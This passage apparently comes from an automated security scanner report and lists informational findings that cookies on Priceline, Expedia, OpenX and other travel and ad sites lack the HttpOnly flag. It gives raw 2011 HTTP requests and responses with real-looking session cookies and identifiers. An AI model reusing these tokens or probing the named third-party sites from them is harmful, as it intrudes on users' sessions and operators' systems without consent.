Summary

Severity:   Information
Confidence:   Certain
Host:   http://travela.priceline.com
Path:   /sharedapps/scs

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sharedapps/scs?val=CCD82172E0702BC07F6EEEC20A4BA00AC57A5F491C628C0467A073D149FA2A3BB6E6E8BBB79E476AEE07A579D4DB94147A61E206E535A32806BAB0F253612BA6DBDA270CF1B13D3FC57A5F491C628C04AC84BA6362ADBF59CACA2EC5D22C91F0A30B769ACEDACD603314752CB71B92D3&ts=1317600634270 HTTP/1.1
Host: travela.priceline.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://travela.priceline.com/hotel/searchResults.do?jsk=5463010a5064010a2011100300091519d011589950&key=gtapcnq5&showDP=y&NYOPRedirNI=null
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Stick2=ID=0%7CA%7C10%2F2%2F2011+20%3A9; vsch=v2011100300090989417126%5F98264026; vid=v2011100300090989417126; SITESERVER=ID=d029e777cf494e903eef89a4c018b0f4; WT_FPC=id=2681d53fc9a0a3b6dd31317600550352:lv=1317600550352:ss=1317600550352; __utma=137358961.1769259490.1317600551.1317600551.1317600551.1; __utmb=137358961.1.10.1317600551; __utmc=137358961; __utmz=137358961.1317600551.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; JSessionKey=5463010a5064010a2011100300091519d011589950; Referral=CLICKID=HOTELSEARCH&WEBENTRYTIME=10%2F02%2F2011+20%3A09%3A15&ID=IGOUGO&PRODUCTID=&SOURCEID=PL; PSessKey=

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:12:58 GMT
Server: Apache
Set-Cookie: SETI=CCD82172E0702BC07F6EEEC20A4BA00AC57A5F491C628C0467A073D149FA2A3BB6E6E8BBB79E476AEE07A579D4DB94147A61E206E535A32806BAB0F253612BA6DBDA270CF1B13D3FC57A5F491C628C04AC84BA6362ADBF59CACA2EC5D22C91F0A30B769ACEDACD603314752CB71B92D3; Domain=.priceline.com; Expires=Thu, 01-Dec-2011 04:59:59 GMT; Path=/
Vary: Accept-Encoding
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,...........D..;
14.224. http://u.openx.net/w/1.0/sc  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://u.openx.net
Path:   /w/1.0/sc

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /w/1.0/sc?r=http%3A%2F%2Fpsa-d.openx.com%2Fw%2F1.0%2Fajs%3Fauid%3D34591%26res%3D1920x1200x16%26plg%3Dswf%2Csl%2Cqt%2Cwmp%2Cshk%26ch%3DISO-8859-1%26tz%3D300%26r%3Dhttp%253A%2F%2Fad.yieldmanager.com%2Fclk%253F3%252CeAGljN9ugjAUxp-GO9L0n1hDdlHWmRCtmwkbwRuDbR2KUKwsEp9-zTC8wE5Ozvl9J9.5EIlNSYlmlEREQ4YPixgRrOZQzZhiIYzjmEA8R5hG4S1NNBcIpjxZra5b.ldiIVYj-SkY3xaj-mAc3AUA1Dp5H09XyeBk.RckFiXpM8Hv7xFrpOTwSJMpWhToPf-EEm8u6.yr3mRvvcyWF.kK6e68RetM0V2ma5kXqDjXcDM98pcwrPq-CwgP8NK3Br0rtRmA7Uw7AGUbfyyPDnSVNy2dOTpzqwIiKAxw9LCtOWmvohlCXquD51N7M67fu7LVttm3P83BuH1lnPGGi1Xe8QtnK3Hf%252C%26url%3Dhttp%253A%2F%2Fad.yieldmanager.com%2Fiframe3%253FsIBdAD10IABKKqQAAAAAAD9DKAAAAAAAAAD8AQYAAAAAAP8A.wD..4orMwAAAAAAqM80AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABo1BIAAAAAAAIAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABWlIC2a93RChYjAkZYQYlvVHyaUTyyLANlDidrAAAAAA%253D%253D%252C%252Chttp%25253A%25252F%25252Fd.tradex.openx.com%25252Fafr.php%25253Frefresh%25253D40%252526zoneid%25253D6511%252526cb%25253Dinsert_random_number_here%252526loc%25253D%252CB%25253D10%252526Z%25253D728x90%252526_salt%25253D31903434%252526r%25253D0%252526s%25253D2126909%252C659e43ce-ed51-11e0-8f45-78e7d1f5b944%252C1317599467411%26ref%3Dhttp%253A%2F%2Fad.yieldmanager.com%2Fst%253Fad_type%253Diframe%2526ad_size%253D728x90%2526section%253D2126909%26cb%3D53152720326%26cc%3D1 HTTP/1.1
Host: u.openx.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://ad.yieldmanager.com/iframe3?sIBdAD10IABKKqQAAAAAAD9DKAAAAAAAAAD8AQYAAAAAAP8A.wD..4orMwAAAAAAqM80AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABo1BIAAAAAAAIAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABWlIC2a93RChYjAkZYQYlvVHyaUTyyLANlDidrAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D6511%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D728x90%26_salt%3D31903434%26r%3D0%26s%3D2126909,659e43ce-ed51-11e0-8f45-78e7d1f5b944,1317599467411
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s=ba6bf0b1-8895-45a9-97a1-53f788c412d7; p=1317599466; i=d2a43928-76cd-49ea-b899-b41fb371435f

Response

HTTP/1.1 302 Moved Temporarily
Set-Cookie: i=2b443041-40a6-4c68-9457-0c205483d61d; Version=1; Expires=Mon, 01 Oct 2012 23:54:13 GMT; Max-Age=31536000; Domain=.openx.net; Path=/
Server: MochiWeb/1.1 WebMachine/1.8.1 (participate in the frantic)
P3P: CP="CUR ADM OUR NOR STA NID"
Location: http://psa-d.openx.com/w/1.0/ajs?auid=34591&res=1920x1200x16&plg=swf,sl,qt,wmp,shk&ch=ISO-8859-1&tz=300&r=http%3A//ad.yieldmanager.com/clk%3F3%2CeAGljN9ugjAUxp-GO9L0n1hDdlHWmRCtmwkbwRuDbR2KUKwsEp9-zTC8wE5Ozvl9J9.5EIlNSYlmlEREQ4YPixgRrOZQzZhiIYzjmEA8R5hG4S1NNBcIpjxZra5b.ldiIVYj-SkY3xaj-mAc3AUA1Dp5H09XyeBk.RckFiXpM8Hv7xFrpOTwSJMpWhToPf-EEm8u6.yr3mRvvcyWF.kK6e68RetM0V2ma5kXqDjXcDM98pcwrPq-CwgP8NK3Br0rtRmA7Uw7AGUbfyyPDnSVNy2dOTpzqwIiKAxw9LCtOWmvohlCXquD51N7M67fu7LVttm3P83BuH1lnPGGi1Xe8QtnK3Hf%2C&url=http%3A//ad.yieldmanager.com/iframe3%3FsIBdAD10IABKKqQAAAAAAD9DKAAAAAAAAAD8AQYAAAAAAP8A.wD..4orMwAAAAAAqM80AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABo1BIAAAAAAAIAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABWlIC2a93RChYjAkZYQYlvVHyaUTyyLANlDidrAAAAAA%3D%3D%2C%2Chttp%253A%252F%252Fd.tradex.openx.com%252Fafr.php%253Frefresh%253D40%2526zoneid%253D6511%2526cb%253Dinsert_random_number_here%2526loc%253D%2CB%253D10%2526Z%253D728x90%2526_salt%253D31903434%2526r%253D0%2526s%253D2126909%2C659e43ce-ed51-11e0-8f45-78e7d1f5b944%2C1317599467411&ref=http%3A//ad.yieldmanager.com/st%3Fad_type%3Diframe%26ad_size%3D728x90%26section%3D2126909&cb=53152720326&cc=1&mi=2b443041-40a6-4c68-9457-0c205483d61d&mn=0&mc=1
Date: Sun, 02 Oct 2011 23:54:13 GMT
Content-Length: 0
Connection: close

14.225. http://user.lucidmedia.com/clicksense/user  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://user.lucidmedia.com
Path:   /clicksense/user

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /clicksense/user?p=a371b4911c4e5b09&r=1 HTTP/1.1
Host: user.lucidmedia.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ads.pubmatic.com/AdServer/js/syncuppixels.html?p=26071&s=26072
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 2=38yalGDMfLj

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
Cache-control: no-cache, no-store
Pragma: no-cache
Date: Mon, 03 Oct 2011 00:14:34 GMT
Expires: Mon, 03 Oct 2011 00:14:34 GMT
P3P: CP="NOI ADM DEV CUR"
X-Handled-By: awserh24/127.0.0.1
Set-Cookie: 2=38yalGDMfLj; Domain=.lucidmedia.com; Expires=Tue, 02-Oct-2012 00:14:34 GMT; Path=/
Location: http://image2.pubmatic.com/AdServer/Pug?vcode=bz0yJnR5cGU9MSZjb2RlPTc2JnRsPTQzMjAw&piggybackCookie=uid:3620501663059719663
Content-Length: 0
Connection: close

14.226. http://uxm.thousandeyes.com/rest/json  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://uxm.thousandeyes.com
Path:   /rest/json

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rest/json?data={%22aid%22:%2211%22,%22sid%22:%22D5E8C261-B1E7-4A8B-AEEE-A8B3463F3408%22,%22r%22:265892,%22si%22:1,%22url%22:%22http://www.agoda.com/%22,%22ua%22:%22Mozilla/5.0%20(Windows%20NT%206.1;%20WOW64)%20AppleWebKit/535.1%20(KHTML,%20like%20Gecko)%20Chrome/14.0.835.187%20Safari/535.1%22,%22dlt%22:10244,%22clt%22:29183,%22dcl%22:37693,%22lt%22:37694,%22nt%22:0,%22rc%22:0,%22ft%22:2013,%22dt%22:0,%22ct%22:0,%22sct%22:null,%22rqt%22:2006,%22rpt%22:2,%22let%22:1,%22nl%22:1886} HTTP/1.1
Host: uxm.thousandeyes.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.agoda.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:40:45 GMT
Server: Apache/2.2.14 (Ubuntu)
P3P: policyref='/p3p/p3p.xml', CP='NOI NID HISa OTPa OUR UNRa BUS COM NAV'
Set-Cookie: _uxm_cid=D5E8C261-B1E7-4A8B-AEEE-A8B3463F3408; Domain=.thousandeyes.com; Expires=Tue, 02-Oct-2012 00:40:45 GMT
Vary: Accept-Encoding
Content-Length: 2
Content-Type: text/html

OK
14.227. http://vitamine.networldmedia.net/bts/generic14.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vitamine.networldmedia.net
Path:   /bts/generic14.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /bts/generic14.php?cname=nwmhotwire&cvalue=hotelsearch HTTP/1.1
Host: vitamine.networldmedia.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/results.jsp?searchTokenId=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:41:30 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.9
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR LAW ADM DEV PSA PSD HIS OUR IND UNI"
Set-Cookie: nwmhotwire=hotelsearch; expires=Wed, 02-Nov-2011 00:41:30 GMT; path=/; domain=networldmedia.net
Vary: Accept-Encoding,User-Agent
Content-Length: 43
X-Cnection: close
Content-Type: image/gif

GIF89a.............!.......,...........D..;
14.228. http://www.agoda.com/partners/partnersearch.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.agoda.com
Path:   /partners/partnersearch.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /partners/partnersearch.aspx?CkInDay=09&CkInMonth=10&CkInYear=2011&CkOutDay=16&CkOutMonth=10&CkOutYear=2011&NumberOfRooms=1&NumberOfAdults=1&NumberOfChildren=0&CityName=&CID=1444075 HTTP/1.1
Host: www.agoda.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.trip.com/hotels.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Content-Type: text/html; charset=utf-8
Location: /
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: agoda.version.02=CookieId=7523af68-b979-4a5c-9566-6cdf92488e9a&AllocId=7e8ed96e55a1afa44758a9a3548685a805d33aa9e52f062bd12dd4c14f0443858201818dc947029deb77f5ece1dfdd8b53ce5b4bcaab65f1374e65c5c00ce5341e3516961f3b6a770dff9a5728226b6f70b9ec62c57523af68b979a5c5666cdf92488e9a&TItems=2$1444075$10-03-2011 07:38$10-02-2012 07:38$; domain=agoda.com; expires=Wed, 03-Oct-2012 00:38:09 GMT; path=/
Date: Mon, 03 Oct 2011 00:38:08 GMT
Content-Length: 118
Cache-Control: no-cache, no-store, must-revalidate, proxy-revalidate

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="/">here</a>.</h2>
</body></html>
14.229. http://www.burstnet.com/cgi-bin/ads/ad22156a.cgi/v=2.3S/sz=300x250A/NZ/9460/NF/RETURN-CODE/JS/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.burstnet.com
Path:   /cgi-bin/ads/ad22156a.cgi/v=2.3S/sz=300x250A/NZ/9460/NF/RETURN-CODE/JS/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /cgi-bin/ads/ad22156a.cgi/v=2.3S/sz=300x250A/NZ/9460/NF/RETURN-CODE/JS/ HTTP/1.1
Host: www.burstnet.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.goal.com/en/news/9/england/2011/10/01/2691360/anderson-confident-manchester-united-will-keep-unbeaten-run
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BOO=opt-out

Response

HTTP/1.1 200 OK
Server: Apache (Unix)
P3P: policyref="http://www.burstnet.com/w3c/p3p.xml", CP="NOI DSP LAW PSAa PSDa OUR IND UNI COM NAV STA"
Ad-Reach: Burst!Media
Pragma: no-cache
Cache-Control: no-cache
Content-Type: text/html
Vary: Accept-Encoding
Content-Length: 248
Date: Sun, 02 Oct 2011 23:58:59 GMT
Connection: close
Set-Cookie: TID=1; path=/; expires=Mon, 04-Jul-2011 23:58:58 GMT; domain=.burstnet.com
Set-Cookie: /ad22156.11567=,CFC,GFC; path=/
Set-Cookie: TData=1; path=/; expires=Mon, 04-Jul-2011 23:58:58 GMT; domain=.burstnet.com
Set-Cookie: CMS=1; path=/; expires=Mon, 04-Jul-2011 23:58:58 GMT; domain=.burstnet.com
Set-Cookie: CMP=1; path=/; expires=Mon, 04-Jul-2011 23:58:58 GMT; domain=.burstnet.com
Set-Cookie: __qca=1; path=/; expires=Mon, 04-Jul-2011 23:58:58 GMT; domain=.burstnet.com
Set-Cookie: /PC=0; path=/; expires=Sun, 09-Oct-2011 23:58:58 GMT
Set-Cookie: /SC=0-2vc.1; path=/


<!--
var cb = Math.random();
var d = document;
d.write('<script language="JavaScript" type="text/javascript"');
d.write('src="http://optimized-by.rubiconproject.com/a/7743/12359/21900-15.js?cb=
...[SNIP]...
14.230. http://www.cheaptickets.com/shop/hotelsearch  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cheaptickets.com
Path:   /shop/hotelsearch

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /shop/hotelsearch?type=hotel&hotel.keyword.key=bos&hotel.rooms[0].adlts=1&hotel.type=keyword&hotel.chkin=10/09/11&hotel.chkout=10/16/11&search=Search&DCSext.mc_kw=&WT.mc_ev=click&WT.mc_id=c_trip_hot&gcid=C16036x354&lpid=plhot HTTP/1.1
Host: www.cheaptickets.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.trip.com/hotels.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anon=7567558764917771317602252; NSC_xxx.difbqujdlfut.dpn.80_gxe=ffffffff09e3887845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: curr=USD; Expires=Sat, 21-Oct-2079 03:52:52 GMT; Path=/
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
P3P: CP="IND NON DSP UNI COM INT STA CUR PSAo PSDo IVAo IVDo OUR"
Pragma: no-cache
Cache-Control: no-store
Set-Cookie: MKTG=ABCDEFGHU0VNfEMxNjAzNngzNTR8IHwxMzE3NjAyMzI1NzUwfEMxNjAzNngzNTR8fDEwLzAyLzIwMTEgMTk6Mzg6NDUgUE18IHwg; Domain=cheaptickets.com; Expires=Wed, 02-Nov-2011 00:38:45 GMT; Path=/
Set-Cookie: dpc=HOTEL%7C2.2%7C%7Cbos%7C%7C%7CUS%7C%7C%7C+%26%26HB%7C%7C2011-10-09%7C2011-10-16%7C%7C+%7C%26%26HE; Expires=Fri, 02-Dec-2011 00:38:45 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 03 Oct 2011 00:38:45 GMT
Content-Length: 432985


...[SNIP]...
14.231. http://www.expedia.com/Hotel-Search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.expedia.com
Path:   /Hotel-Search

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /Hotel-Search?olacid=US.BD.IGOUGO-US.HOTEL.HOTEL& HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
Content-Length: 1104
Cache-Control: max-age=0
Origin: http://www.expedia.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.expedia.com/pubspec/scripts/eap.asp?OLACID=US.BD.IGOUGO-US.HOTEL.HOTEL&GOTO=HotSearch&CityName=Boston,United%20States&InDate=10/04/2011&OutDate=10/07/2011&NumAdults=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: p1=`tpid=v.1,1`11; MC1=GUID=CCF4A420AF8B480F8413EFB42E880287; COOKIECHECK=1

action=hotelPackageWizard%40searchHotelOnly&packageType=HOTEL_ONLY&hotelPackageWizard_hotelPackageWizardControl_inpPackageType=HOTEL_ONLY&hotelPackageWizard_hotelPackageWizardControl_hotelWidgetContro
...[SNIP]...

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Date: Mon, 03 Oct 2011 00:10:26 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: iEAPID=00000,; Domain=.expedia.com; Path=/
Set-Cookie: ipsnf3_ext=; Domain=.expedia.com; Expires=Sun, 03-Oct-2010 00:10:25 GMT; Path=/
Set-Cookie: ipsnf3_ext=; Domain=.expedia.com; Expires=Sun, 03-Oct-2010 00:10:25 GMT; Path=/
Content-Length: 589661

<!DOCTYPE html><DIV ID="interstitialServerPush1" style="display:block">

<!--Table here is required so that we can center the page in all displays-->
<table class="basicInterstialWidget" border="0
...[SNIP]...
14.232. http://www.expedia.com/TripPreferences  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.expedia.com
Path:   /TripPreferences

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /TripPreferences?tripid=ddb62d72-d4e4-48fc-9bbf-b63a310bc860&c=1fd513e4-34cd-4ab1-989a-2d21d0c48818 HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.expedia.com/Hotel-Search?olacid=US.BD.ORBITZ.HOTEL.HOTEL&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=CCF4A420AF8B480F8413EFB42E880287; U9Z5=0; s_vi=[CS]v1|27447EB905149286-6000018C4001272D[CE]; COOKIECHECK=1; lsrc=v.1,10/16/2011; MediaCookie=0`1034,1004,PDEST,BOS; iEAPID=21187; aspp=v.1,0|TRIPA.Expedia_US-H_B4.11893.T|||||||||ICM|20111101|; aspp=v.1,0|TRIPA.Expedia_US-H_B4.11893.T|||||||||ICM|20111101|; bn_u=7520316067152911274; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; JSESSION=1cf0d0d6-5e6f-4aff-9a37-f908a92430be; s1=`EAPName=TripAdvisor`EAPBrandingFeature=0`user=v.8,0,EX010F7C6DCC$F1$88001000$D6$5C37n$BE$C6$0En$BE$C6$0En$BE$C6$0E1000$11000$1E81!90$BB$B4$8E$8Ah$14l$AD!i02000`EAPIsVisible=0`EAPIndustry=Other`MH=21187`EAPBrandingURL=`218; p1=`accttype=v.2,8,1,EX012A48FECC$9B$B1KB$F2$A4$FBL$F2$BC$FC$2B$95$FF$9B$90z$9Ds$C2$E1$82$EB!2$E3$AC$37I$8DW$85$AA$BDM`minfo=v.5,EX01B7A7E781$9B$B1KB$EF$A4$FBJ$F2$A0$FC$25$96$FF$9A$90l$9Ds$C4$E1$82$EF$E3$EB$AC$37E$8DW$8B$9C$BDM$29q$E3$9A$13$CDO$15$A4$F7$5C$FE$EBEn$0E$83.$B6$FD$ED$9E$A4$E4$C16$86k$EF`tpid=v.1,1`linfo=v.4,Guest|0|0|255|1|0||Guest|User|Guest|User|Guest S User|247905900|1033|0|0||0|0|0|-1|-1`404

Response

HTTP/1.1 301 Moved Permanently
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Location: https://www.expedia.com/TripPreferences?tripid=ddb62d72-d4e4-48fc-9bbf-b63a310bc860&c=1fd513e4-34cd-4ab1-989a-2d21d0c48818&
Content-Type: text/HTML;charset=UTF-8
Content-Length: 0
Date: Mon, 03 Oct 2011 01:07:17 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: iEAPID=00000,; Domain=.expedia.com; Path=/

14.233. http://www.expedia.com/daily/common/mscookie.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.expedia.com
Path:   /daily/common/mscookie.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /daily/common/mscookie.aspx?PDEST=BOS HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.expedia.com/Hotel-Search?olacid=US.BD.IGOUGO-US.HOTEL.HOTEL&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=CCF4A420AF8B480F8413EFB42E880287; COOKIECHECK=1; iEAPID=0000,; lsrc=v.1,10/16/2011; JSESSION=aa0f7acd-9a8d-4dba-a7c4-36d8d1ea2a11; s1=`0; p1=`tpid=v.1,1`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`63; aspp=v.1,0|US.BD.IGOUGO-US.HOTEL.HOTEL|||||||||OLA|20111101|; aspp=v.1,0|US.BD.IGOUGO-US.HOTEL.HOTEL|||||||||OLA|20111101|; U9Z5=CT-1

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Cteonnt-Length: 96
Content-Length: 96
Date: Mon, 03 Oct 2011 00:10:59 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: MediaCookie=0`1034,1004,PDEST,BOS; domain=.expedia.com; expires=Tue, 31-Jan-2012 01:10:59 GMT; path=/


<!--V. 1.8 5/6/2010-->
<html>
<head>
<title></title>

</head>
<body>

</body>
</html>
14.234. http://www.expedia.com/pubspec/scripts/eap.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.expedia.com
Path:   /pubspec/scripts/eap.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pubspec/scripts/eap.asp?GOTO=HotAvail&HotID=894999&InDate=10/14/11&OutDate=10/16/11&NumAdult=2&NumChild=0&eapid=21187-1&ICMCID=TRIPA.Expedia_US-H_B4.11893.T&ICMDTL=MT1110027Z3xeMPeET6itK0Qu1f-JQAAU.894999.HDSSDeE.T.QCI.258705.ch.668.60745.en_US.. HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
